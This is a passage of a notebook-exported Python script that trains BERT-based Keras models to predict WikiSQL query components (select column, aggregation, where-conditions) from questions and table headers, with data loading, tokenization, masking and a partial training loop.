name=\"ce_weights\")\n \n bert_inputs = [in_id, in_mask, in_segment]\n all_inputs = [in_id, in_mask, in_segment]\n bert_output = BertLayer(n_fine_tune_layers=3)(bert_inputs)\n\n denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(bert_output)\n denseSA = tf.keras.layers.Dense(256, activation='relu',name=\"denseSA\")(bert_output)\n denseWN = tf.keras.layers.Dense(256, activation='relu',name=\"denseWN\")(bert_output)\n denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(bert_output)\n denseWO = tf.keras.layers.Dense(256, activation='relu',name=\"denseWO\")(bert_output)\n \n \n sc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(denseSC)\n sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n wc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWC)\n wo = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n #loss = weighted_categorical_crossentropy(weight_input) \n #loss=,\n model = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n \n\n model.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n \"sa_output\":\"sparse_categorical_crossentropy\",\n \"wn_output\":\"sparse_categorical_crossentropy\",\n #'wc_output': loss, \n #'wo_output': loss}, optimizer='adam', metrics=['accuracy'])\n 'wc_output': 'categorical_crossentropy', \n 'wo_output': 'categorical_crossentropy'}, optimizer='adam', 
metrics=['accuracy'])\n model.summary()\n \n return model\n\ndef initialize_vars(sess):\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n K.set_session(sess)\n\n\n# In[128]:\n\n\n#test_labels_wc.shape\n\n\n# ## DEFINE THE ACTUAL BERT LAYER\n# \n# \n# \n# \n\n# In[12]:\n\n\n\n\n# In[6]:\n\n\nbert_module = hub.Module(\"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\", trainable=True)\n\n\n# In[11]:\n\n\ndef create_tokenizer_from_hub_module(bert_hub_module_handle):\n \"\"\"Get the vocab file and casing info from the Hub module.\"\"\"\n with tf.Graph().as_default():\n tf.print('GRAPH STARTED')\n bert_module = hub.Module(bert_hub_module_handle)\n tf.print('MODULE DOWNLOADED')\n tokenization_info = bert_module(signature=\"tokenization_info\", as_dict=True)\n tf.print('TOKENIZATION INFO LOADED')\n with tf.Session() as sess:\n tf.print('SESSION STARTED')\n vocab_file, do_lower_case = sess.run([tokenization_info[\"vocab_file\"],\n tokenization_info[\"do_lower_case\"]])\n tf.print('VARIABLES RAN')\n return FullTokenizer(\n vocab_file=vocab_file, do_lower_case=do_lower_case)\n\n\n# ## BERT FORMATTING AND OUTPUT GENERATION\n\n# In[10]:\n\n\ndef generate_inputs(tokenizer, nlu1_tok, hds1):\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n\n segment_ids.append(0)\n for token in nlu1_tok:\n tokens.append(token)\n segment_ids.append(0)\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n header_break = [len(tokens),len(tokens) + len(hds1)]\n # for doc\n for i, hds11 in enumerate(hds1):\n sub_tok = tokenizer.tokenize(hds11)\n tokens += sub_tok\n segment_ids += [1] * len(sub_tok)\n if i < len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n elif i == len(hds1)-1:\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n else:\n raise EnvironmentError\n\n\n return tokens, segment_ids, header_break\n\ndef _formatForBert(tokenizer, query_token, header_token, max_seq_length):\n #####For each example, tokenize with BERT tokenizer\n #Mark each example begining, and separate each header \n #so BERT understands the query is a meaningful sequence of words but the headers are not\n #concatenate the tokens with breaks but preserve where the headers stop and start\n #then pad each example to the max sequence length within each batch\n double_tokenized_tokens = []\n for (i, token) in enumerate(query_token):\n #t_to_tt_idx1.append(\n # len(double_tokenized_tokens)) # all_doc_tokens[ indicate the start position of original 'white-space' tokens.\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n # tt_to_t_idx1.append(i)\n double_tokenized_tokens.append(sub_token) # all_doc_tokens are further tokenized using WordPiece tokenizer\n\n tokens1, segment_ids1, header_break = generate_inputs(tokenizer, double_tokenized_tokens, header_token)\n input_ids1 = tokenizer.convert_tokens_to_ids(tokens1)\n\n # Input masks\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask1 = [1] * len(input_ids1)\n\n # 3. 
Zero-pad up to the sequence length.\n while len(input_ids1) < max_seq_length:\n input_ids1.append(0)\n input_mask1.append(0)\n segment_ids1.append(0)\n\n assert len(input_ids1) == max_seq_length\n assert len(input_mask1) == max_seq_length\n assert len(segment_ids1) == max_seq_length\n return input_ids1,tokens1,segment_ids1,input_mask1,header_break\n\ndef formatForBert(train_data,BERT_PT_PATH= \"/DataDrive/master-wikisql/annotated_data/\",bert_type=\"uncased_L-12_H-768_A-12\",max_seq_length=222):\n \n input_ids = []\n tokens = []\n segment_ids = []\n input_masks = []\n header_breaks = []\n\n bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')\n vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')\n\n bert_config = BertConfig.from_json_file(bert_config_file)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=vocab_file, do_lower_case=True)\n \n for train_example in train_data:\n query_token = train_example[\"query\"]\n header_token = train_example[\"header\"]\n input_ids1, tokens1, segment_ids1, input_mask1, header_break = _formatForBert(tokenizer, query_token,header_token,max_seq_length)\n input_ids.append(input_ids1)\n tokens.append(tokens1)\n segment_ids.append(segment_ids1)\n input_masks.append(input_mask1)\n header_breaks.append(header_break)\n\n #TODO return header breaks and use it too\n #bert_inputs = []\n return np.array(input_ids), np.array(input_masks), np.array(segment_ids)\n\ndef getBertOutput(bert_inputs, max_seq_length):\n all_input_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_ids\")\n all_input_mask = tf.keras.layers.Input(shape=(max_seq_length,), name = \"input_masks\")\n all_segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), name = \"segment_ids\")\n bert_output = BertLayer(n_fine_tune_layers=10)(bert_inputs)\n\n\n# ## READING INPUT, PARSING INTO WHAT WILL BE FED TO THE MODEL\n\n# In[9]:\n\n\ndef makeTrainingData(wikisql_path = \"/DataDrive/master-wikisql/annotated_data/\",sample_size=32,use_reduced_set=False):\n train_data, train_table, dev_data, dev_table, _, _ = load_wikisql(wikisql_path,\n use_reduced_set, sample_size, no_w2i=True, no_hs_tok=True)\n \n return parseToTextLines(train_data,train_table)\n\ndef parseToTextLines(train_data,train_table):\n train_dataframe = pd.DataFrame(train_data)\n question_toks = [[x.lower() for x in sublist] for sublist in train_dataframe[\"question_tok\"].tolist()]\n sql = train_dataframe[\"sql\"].tolist()\n table_ids = train_dataframe[\"table_id\"].tolist()\n table_headers = [[x.lower() for x in train_table[tid][\"header\"]] for tid in table_ids]\n labels = parseSqlToLabels(sql)\n assert len(question_toks)==len(table_headers)\n \n keras_model_train_data = [{\"query\":question_toks[i],\"header\":table_headers[i]} for i in range(len(question_toks))]\n return keras_model_train_data, labels\n\n\n# In[8]:\n\n\ndef load_wikisql(path_wikisql, toy_model, toy_size, bert=False, no_w2i=False, no_hs_tok=False, aug=False):\n # Get data\n train_data, train_table = load_wikisql_data(path_wikisql, mode='train', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok, aug=aug)\n dev_data, dev_table = load_wikisql_data(path_wikisql, mode='dev', toy_model=toy_model, toy_size=toy_size, no_hs_tok=no_hs_tok)\n\n\n # Get word vector\n if no_w2i:\n w2i, wemb = None, None\n else:\n w2i, wemb = load_w2i_wemb(path_wikisql, bert)\n\n\n return train_data, train_table, dev_data, dev_table, w2i, wemb\n\n\ndef load_wikisql_data(path_wikisql, mode='train', toy_model=False, toy_size=10, 
no_hs_tok=False, aug=False):\n \"\"\" Load training sets\n \"\"\"\n if aug:\n mode = f\"aug.{mode}\"\n print('Augmented data is loaded!')\n\n path_sql = os.path.join(path_wikisql, mode+'_tok.jsonl')\n if no_hs_tok:\n path_table = os.path.join(path_wikisql, mode + '.tables.jsonl')\n else:\n path_table = os.path.join(path_wikisql, mode+'_tok.tables.jsonl')\n\n data = []\n table = {}\n with open(path_sql) as f:\n for idx, line in enumerate(f):\n if toy_model and idx >= toy_size:\n break\n\n t1 = json.loads(line.strip())\n data.append(t1)\n\n with open(path_table) as f:\n for idx, line in enumerate(f):\n if toy_model and idx > toy_size:\n break\n\n t1 = json.loads(line.strip())\n table[t1['id']] = t1\n\n return data, table\n\n\n# ## FORMATTING SQL LABELS\n\n# In[7]:\n\n\ndef get_g(sql_i):\n \"\"\" for backward compatibility, separated with get_g\"\"\"\n g_sc = []\n g_sa = []\n g_wn = []\n g_wc = []\n g_wo = []\n g_wv = []\n for b, psql_i1 in enumerate(sql_i):\n g_sc.append( psql_i1[\"sel\"] )\n g_sa.append( psql_i1[\"agg\"])\n\n conds = psql_i1['conds']\n if not psql_i1[\"agg\"] < 0:\n g_wn.append( len( conds ) )\n g_wc.append( get_wc1(conds) )\n g_wo.append( get_wo1(conds) )\n g_wv.append( get_wv1(conds) )\n else:\n raise EnvironmentError\n return g_sc, g_sa, g_wn, g_wc, g_wo, g_wv\n\ndef padWhereConditions(clause_list):\n b = np.zeros([len(clause_list),len(max(clause_list,key = lambda x: len(x)))])\n b[:] = -1\n for i,j in enumerate(clause_list):\n b[i][0:len(j)] = j\n return(b)\ndef multihotEncodeWhereThings(where_things):\n max_where_things = len(set([x for y in where_things for x in y]))\n where_things_multihot = np.zeros([len(where_things),max_where_things])\n for i, where_things_locs in enumerate(where_things):\n where_things_multihot[i][where_things_locs] = 1\n \n return where_things_multihot\n \ndef parseSqlToLabels(sql): \n #return sql\n #return [random.randint(0, 1) for x in sql]\n sc,sa,wn,wc,wo,wv = get_g(sql)\n wc,wo = multihotEncodeWhereThings(wc),multihotEncodeWhereThings(wo)\n return np.array(sc),np.array(sa),np.array(wn),wc,wo\n\n\n#define token start and stop positions\ndef tok_hdr_start_top(input_ids):\n\ttok_pos = []\n\thead_pos = []\n\tfor idx, row in enumerate(input_ids):\n\t\t#print(idx)\n\t\t#seg positions\n\t\tsegs_long = np.where(row == 102)[0]\n\t\ttok_pos.append([1, segs_long[0]]) #start position is 1, ignore [CLS] token\n\t\tsegs = [];\n\t\tfor s in range(1,len(segs_long)):\n\t\t\tstart = segs_long[s-1] + 1 # start position\n\t\t\tend = segs_long[s] # end position\n\t\t\t#segs.append([start,end])\n\t\t\tsegs.append([start, start+1])\n\t\t\t\n\t\thead_pos.append(segs)\n\ttok_pos = np.array(tok_pos)\n\thead_pos = np.array(head_pos)\n\treturn tok_pos, head_pos\n\ndef create_wemb_masks(tok_pos, head_pos, mask_shape):\n\ttok_mask = np.zeros(mask_shape)\n\thead_mask = np.zeros(mask_shape)\n\thead_col_mask = np.ones(mask_shape)\n\tfor tidx, tp in enumerate(tok_pos):\n\t\ttok_mask[tidx, tp[0]:tp[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\tfor hidx, hp in enumerate(head_pos):\n\t\tfor hp1 in hp:\n\t\t\thead_col_mask[hidx,hp1[0]:hp1[1],:] = 1\n\t\n\treturn tok_mask, head_mask, head_col_mask\n\t\n\t\n\t\ndef mask_func(x):\n\tbool_mask = tf.logical_not(tf.greater(x,1))\n\tmask = tf.ones_like(x)*-9999999.0\n\tx = tf.where(bool_mask, x, mask)\n\treturn x\n\n\n#def mask_func(x):\n#\tx = tf.slice(x,[0,0,0],[x.shape[0], x.shape[1],1])\n#\tbool_mask = tf.greater(x,0)\n\t\n#\tmask = 
tf.ones_like(x)*-9999999.0\n#\tx = tf.where(bool_mask, x, mask)\n#\treturn x\n\t\ndef output_hack(x):\n\tbool_mask = tf.greater(x,0)\n\tnon_zero_values = tf.gather_nd(x, tf.where(boolean_mask))\n\trows = tf.split(non_zero_values, n_non_zero)\n\t#print(rows)\n\t# Pad with zeros wherever necessary and recombine into a single tensor\n\tout = tf.stack([tf.argmax(r)for r in rows])\n\t#rows = tf.split(non_zero_values, n_non_zero)\n\t\ndef build_model_masked(max_seq_length,max_out_len, wemb_mask_shape): \n\tmax_header_length = 13\n\ttuple(test_mask_shape[1:])\n\tin_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n\tin_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n\tin_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n\tweight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n\n\twemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n\twemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n\twemb_h_col_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_col_mask\")\n\n\tbert_inputs = [in_id, in_mask, in_segment]\n\tall_inputs = [in_id, in_mask, in_segment, wemb_n_mask, wemb_h_mask, wemb_h_col_mask]\n\tpooled_output, seq_output = BertLayer(n_fine_tune_layers=0, trainable = False)(bert_inputs)\n\tprint(seq_output)\n\n\t#wemb_n = tf.keras.layers.Multiply()([seq_output, wemb_n_mask])\n\t#wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n\t#wemb_h_col = tf.keras.layers.Multiply()([seq_output, wemb_h])\n\t#wemb_h_col = tf.keras.layers.Lambda(lambda x: mask_func(x))(wemb_h)\n\n\t#wemb_h_col = slice_concat()(wemb_h)\n\t#print(wemb_h_col)\n\t#wemb_n = tf.keras.layers.Flatten()(wemb_n)\n\t#wemb_h = tf.keras.layers.Flatten()(wemb_h)\n\twemb_h_col = tf.keras.layers.Flatten()(seq_output)\n\tprint(wemb_h_col)\n\t####mask and shit here\n\n\t#denseSC = tf.keras.layers.Dense(256, activation='relu',name=\"denseSC\")(wemb_h_col)\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(wemb_h)\n\tdenseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(pooled_output)\n\n\tdenseWN = tf.keras.layers.Dense(4, activation='relu',name=\"denseWN\")(pooled_output)\n\t#denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h_col)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(wemb_h)\n\tdenseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(pooled_output)\n\n\n\tsc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(wemb_h_col)\n\tsa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n\twn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n\twc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWN)\n\two = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n\t#loss = weighted_categorical_crossentropy(weight_input) \n\t#loss=,\n\tmodel = tf.keras.models.Model(inputs=all_inputs, outputs=[sc,sa,wn,wc,wo])\n\n\n\tmodel.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t\"sa_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t\"wn_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#'wc_output': loss, \n\t\t\t\t\t\t#'wo_output': loss}, \n\t\t\t\t\t\t'wc_output': 'categorical_crossentropy', \n\t\t\t\t\t\t'wo_output': 'categorical_crossentropy'\n\t\t\t\t\t\t}, 
optimizer='adam', metrics=['accuracy'])\n\tmodel.summary()\n\n\treturn model\n\n\nclass BertLayer(tf.layers.Layer):\n\tdef __init__(self, n_fine_tune_layers=10, **kwargs):\n\t\tself.n_fine_tune_layers = n_fine_tune_layers\n\t\tself.trainable = True\n\t\tself.output_size = 768\n\t\tsuper(BertLayer, self).__init__(**kwargs)\n\n\tdef build(self, input_shape):\n\t\tself.bert = hub.Module(\n\t\t\tbert_path,\n\t\t\ttrainable=self.trainable,\n\t\t\tname=\"{}_module\".format(self.name)\n\t\t)\n\t\ttrainable_vars = self.bert.variables\n\t\t\n\t\t# Remove unused layers\n\t\ttrainable_vars = [var for var in trainable_vars if not \"/cls/\" in var.name]\n\t\t\n\t\t# Select how many layers to fine tune\n\t\ttrainable_vars = trainable_vars[-self.n_fine_tune_layers :]\n\t\t\n\t\t# Add to trainable weights\n\t\tfor var in trainable_vars:\n\t\t\tself._trainable_weights.append(var)\n\t\t\n\t\t# Add non-trainable weights\n\t\tfor var in self.bert.variables:\n\t\t\tif var not in self._trainable_weights:\n\t\t\t\tself._non_trainable_weights.append(var)\n\t\t\n\t\tsuper(BertLayer, self).build(input_shape)\n\n\tdef call(self, inputs):\n\t\tinputs = [K.cast(x, dtype=\"int32\") for x in inputs]\n\t\tinput_ids, input_mask, segment_ids = inputs\n\t\tbert_inputs = dict(\n\t\t\tinput_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids\n\t\t)\n\t\tresult = self.bert(inputs=bert_inputs, signature=\"tokens\", as_dict=True)\n\t\tpooled_output = result['pooled_output']\n\t\tseq_output = result['sequence_output']\n\t\tprint('CONCAAAT')\n\t\t#seq_output = tf.map_fn(lambda x:remap(x), seq_output,infer_shape=False)\n\t\t#seq_output = seq_output[:,:,0]\n\t\t#seq_output = tf.reshape(seq_output, shape = (32, 222))\n\t\t#slice_concat()(wemb_h)\n\t\treturn pooled_output, seq_output\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], self.output_size)\n\n\ndef build_model_masked_select(max_seq_length,max_out_len, wemb_mask_shape, mask_idx): \n\tmax_header_length = 13\n\t#tuple(test_mask_shape[1:])\n\tin_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n\tin_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n\tin_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n\tweight_input = tf.keras.layers.Input(shape=(max_out_len,), name=\"ce_weights\")\n\n\twemb_n_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_n_mask\")\n\twemb_h_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_mask\")\n\twemb_h_col_mask = tf.keras.layers.Input(shape=wemb_mask_shape, name=\"wemb_h_col_mask\")\n\twemb_mask_idx= tf.keras.layers.Input(shape=tuple(wemb_mask_shape[1:]), name=\"wemb_h_col_mask\")\n\t\n\toutput_mask = tf.keras.layers.Input(shape = (max_header_length,), name = 'output_mask')\n\t\n\t\n\tbert_inputs = [in_id, in_mask, in_segment]\n\tall_inputs = [in_id, in_mask, in_segment, wemb_n_mask, wemb_h_mask, wemb_h_col_mask, output_mask]\n\tpooled_output, seq_output = BertLayer(n_fine_tune_layers=1, trainable = False)(bert_inputs)\n\t\n\t#test = slice_concat()\n\t#test.build(mask_idx)\n\t#test = test(seq_output)\n\t#print(test)\n\t#wemb = tf.keras.layers.Lambda(lambda x: K.map_fn(lambda y:remap(y),x),output_shape=[32,222,768])(seq_output)\n\t\n\t\n\t#wemb = tf.reshape(wemb, shape = [tf.shape(seq_output)[0], 222, 768])\n\t#print(wemb)\n\t#print('BEFORE')\n\t#print(wemb)\n\t#wemb = tf.keras.layers.Reshape((-1, 222,768))(wemb)\n\t#print(wemb)\n\t#print(seq_output)\n\n\t#wemb_n = tf.keras.layers.Multiply()([seq_output, 
wemb_n_mask])\n\t#wemb_h = tf.keras.layers.Multiply()([seq_output, wemb_h_mask])\n\t#wemb_h = \n\t\n\ttest = slice_concat()\n\ttest.build(mask_idx)\n\ttest = test(seq_output)\n\t#wemb_h = tf.slice_concat()(wemb_h)\n\t#wemb_h_col = tf.keras.layers.Multiply()([seq_output, wemb_h])\n\t#wemb_h_col = tf.keras.layers.Lambda(lambda x: mask_func(x))(wemb_h)\n\n\t#wemb_h_col = slice_concat()(wemb_h)\n\t#print(wemb_h_col)\n\t#wemb_n = tf.keras.layers.Flatten()(wemb_n)\n\t#wemb_h = tf.keras.layers.Flatten()(wemb_h)\n\t#wemb_h_col = tf.keras.layers.Flatten()(seq_output)\n\t#print(wemb_h_col)\n\t####mask and shit here\n\n\tdenseSC = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC\")(test)\n\t#denseSC1 = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC1\")(denseSC)\n\t#denseSC2 = tf.keras.layers.Dense(1024, activation='relu',name=\"denseSC2\")(denseSC1)\n\t\n\t\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(wemb_h)\n\t#denseSA = tf.keras.layers.Dense(4, activation='relu',name=\"denseSA\")(pooled_output)\n\n\t#denseWN = tf.keras.layers.Dense(4, activation='relu',name=\"denseWN\")(pooled_output)\n\t#denseWC = tf.keras.layers.Dense(256, activation='relu',name=\"denseWC\")(wemb_h_col)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(wemb_h)\n\t#denseWO = tf.keras.layers.Dense(4, activation='relu',name=\"denseWO\")(pooled_output)\n\t\n\t#pre_sc = tf.keras.layers.Dense(max_header_length, activation='linear',name=\"sc_pre_output\")(denseSC2)\n\t#pre_sc = tf.keras.layers.Add()([pre_sc, output_mask])\n\t\n\t#sc = tf.keras.layers.Activation(activation = 'softmax', name = 'sc_output')(pre_sc)\n\tsc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"sc_output\")(denseSC)\n\t#sa = tf.keras.layers.Dense(4, activation='softmax',name=\"sa_output\")(denseSA)\n\t#wn = tf.keras.layers.Dense(4, activation='softmax',name=\"wn_output\")(denseWN) \n\t#wc = tf.keras.layers.Dense(max_header_length, activation='softmax',name=\"wc_output\")(denseWN)\n\t#wo = tf.keras.layers.Dense(3, activation='softmax',name=\"wo_output\")(denseWO)\n\n\t#loss = weighted_categorical_crossentropy(weight_input) \n\t#loss=,\n\tmodel = tf.keras.models.Model(inputs=all_inputs, outputs=[sc])\n\n\n\tmodel.compile(loss={\"sc_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#\"sa_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#\"wn_output\":\"sparse_categorical_crossentropy\",\n\t\t\t\t\t\t#'wc_output': loss, \n\t\t\t\t\t\t#'wo_output': loss}, \n\t\t\t\t\t\t#'wc_output': 'categorical_crossentropy', \n\t\t\t\t\t\t#'wo_output': 'categorical_crossentropy'\n\t\t\t\t\t\t}, optimizer='adam', metrics=['accuracy'])\n\tmodel.summary()\n\n\treturn model, seq_output\n \n\n###############################\n###############################\ndef pad_values(a_as_vector, max_n = 20):\n print(a_as_vector)\n zero_padding = tf.zeros(max_n - tf.shape(a_as_vector), dtype=a_as_vector.dtype)\n # Concatenate `a_as_vector` with the padding.\n a_padded = K.concatenate([a_as_vector, zero_padding], 0)\n print(a_padded)\n return a_padded\n \ndef remap(vector_a):\n b = K.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),vector_a)\n return b\n \ndef remap_old(vector_a):\n b = tf.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),vector_a)\n # b = b.slice(start = [0,0], \n return b\n\nclass slice_concat(tf.layers.Layer):\n\tdef __init__(self):\n\t\tsuper(slice_concat, self).__init__()\n\tdef build(self, 
mask_idx):\n\t\tself.mask_idx = mask_idx\n\t\t#self.max_n = input_params[1]\n\t\t#print(input_params)\n\t\tsuper(slice_concat, self).build(mask_idx)\n\tdef call(self, inputs):\n\t\tout_arr = tf.gather_nd(inputs, self.mask_idx)\n\t\tprint(out_arr)\n\t\t#out_arr = tf.stack(tf.map_fn(lambda x:remap(x), inputs,infer_shape=False))\n\t\t#print(out_arr)\n\t\t#out_arr = tf.map_fn(lambda x: slice_map(x,self.input_idx), inputs)\n\t\t#slice_x = tf.slice(inputs, begin = [0,0,0], size = [tf.shape(inputs)[-1], 222, 0])\n\t\t#out_arr = tf.map_fn(lambda x:pad_values(tf.gather(x,tf.squeeze(tf.where(tf.not_equal(x,0))))),inputs)\n\t\t#out_arr = tf.stack(out_arr)\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.reshape(out_arr, shape = (tf.shape(inputs)[0],222,768))\n\t\t#tf.print(tf.shape(out_arr))\n\t\t##out_arr = out_arr[:,:,0]\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.squeeze(out_arr)\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#out_arr = tf.reshape(out_arr, shape = (tf.shape(inputs)[0],222))\n\t\t#tf.print(tf.shape(out_arr))\n\t\t#print(out_arr)\n\t\t#out_arr = tf.slice(out_arr, begin = [0,0,0], size = tf.shape(out_arr)[-1], max_n, tf\n\t\treturn out_arr\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], 2)\n\t\t\nclass custom_mask(tf.layers.Layer):\n\tdef __init_(self):\n\t\tsuper(custom_mask,self).__init__()\n\tdef build(self, mask_idx):\n\t\tself.mask_idx = mask_idx\n\t\tsuper(custom_mask, self).build(mask_idx)\n\tdef call():\n\t\treturn self.mask_idx\n##################################\n\ndef zero_pad_mask(mask, n_pos = 20):\n\tmask_df = pd.DataFrame(mask)\n\tmask_df = mask_df[mask_df[2] == 0]\n\tout = [];\n\t\n\tfor bid in mask_df[0].unique():\n\t\tbatch_df = mask_df[mask_df[0] == bid]\n\t\tbatch_arr = batch_df.iloc[:n_pos,:].values\n\t\tn_missing = n_pos - batch_arr.shape[0]\n\t\tpad = np.tile([0,0,0], [n_missing, 1])\n\t\tbatch_arr = np.concatenate((batch_arr, pad))\n\t\tbatch_arr = [list(row) for row in batch_arr]\n\t\t#print(batch_arr.shape)\n\t\tout.append(batch_arr)\n\t\n\t##out = np.concatenate(batch_arr, axis = 1)\n\treturn out\n\t\t\n\t\n\t\n\t\n\t\t\n\n\n\t\t\n\nif __name__ == '__main__':\n\tnum_CPU = 1\n\tnum_GPU = 0\n\tnum_cores = 10\n\tconfig = tf.ConfigProto(intra_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tinter_op_parallelism_threads=num_cores,\n\t\t\t\t\t\tallow_soft_placement=True,\n\t\t\t\t\t\tdevice_count = {'CPU' : num_CPU,\n\t\t\t\t\t\t\t\t\t\t'GPU' : num_GPU}\n\t\t\t\t\t )\n\n\tsess = tf.Session(config = config)\n\n\ttraining_data, train_labels = makeTrainingData(use_reduced_set=True,sample_size=10000)\n\tsc,sa,wn,wc,wo = train_labels\n\t\n\t# In[4]:\n\tos.environ['TFHUB_CACHE_DIR'] = '/DataDrive/master-wikisql/tfhub_cache/'\n\n\n\t# In[5]:\n\tbert_path = \"https://tfhub.dev/google/bert_uncased_L-12_H-768_A-12/1\"\n\tset(wc.flatten())\n\n\t# In[87]:\n\tmax_num_headers = len(set(wc.flatten()))\n\tw = np.ones([wc.shape[0],wc.shape[1],max_num_headers])\n\tw.shape\n\tw[np.where(wc==-1)] = 0\n\tlen(w)\n\n\n\t#training_data, train_labels = makeTrainingData(use_reduced_set=True,sample_size=10000)\n\t#sc,sa,wn,wc,wo = train_labels\n\t\n\tmax_num_headers = len(set(wc.flatten()))\n\tw = np.ones([wc.shape[0],wc.shape[1]])\n\t#w[np.where(w>=0)] = 1\n\tw[np.where(wc==-1)] = 0\n\tmax_out_len = wc.shape[1]\n\t\n\tsplit = int(0.8*len(wc))\n\ttest_data = training_data[split:]\n\ttraining_data = training_data[:split]\n\n\ttest_labels_sc = sc[split:]\n\ttrain_labels_sc = sc[:split]\n\n\ttest_labels_sa = sa[split:]\n\ttrain_labels_sa = 
sa[:split]\n\n\n\ttest_labels_wn = wn[split:]\n\ttrain_labels_wn = wn[:split]\n\n\ttest_labels_wc = wc[split:]\n\ttrain_labels_wc = wc[:split]\n\n\ttest_labels_wo = wo[split:]\n\ttrain_labels_wo = wo[:split]\n\n\ttrain_weights = w[:split]\n\ttest_weights = w[split:]\n\t#test_labels = np.array(test_labels).reshape(-1, 1)\n\t#train_labels= np.array(train_labels).reshape(-1, 1)\n\n\ttrain_input_ids,train_input_masks,train_segment_ids = formatForBert(training_data)\n\ttest_input_ids,test_input_masks,test_segment_ids = formatForBert(test_data)\n\n\t#training_data,train_labels = makeTrainingData(use_reduced_set=True,sample_size=5000)\n\n\t\n\tmax_seq_length = 222\n\tbert_out_size = 768\n\tbatch_size = 32\n\tfor epoch in range(10):\n\t\tfor b in range(0, 8000, batch_size):\n\t\t\tin_train_input_ids = train_input_ids[b:b+batch_size]\n\t\t\tin_train_input_masks = train_input_masks[b:b+batch_size]\n\t\t\tin_train_segment_ids = train_segment_ids[b:b+batch_size]\n\t\t\tin_train_labels_sc = train_labels_sc[b:b+batch_size]\n\t\t\t\n\t\t\t#header start stopcreate masks for train and test\n\t\t\ttrain_mask_shape = (len(in_train_input_ids), max_seq_length, bert_out_size)\n\t\t\ttrain_tok_pos, train_head_pos = tok_hdr_start_top(in_train_input_ids)\n\t\t\ttrain_tok_mask, train_head_mask, train_head_col_mask = create_wemb_masks(train_tok_pos, train_head_pos, train_mask_shape)\n\t\t\ttrain_head_mask_idx = 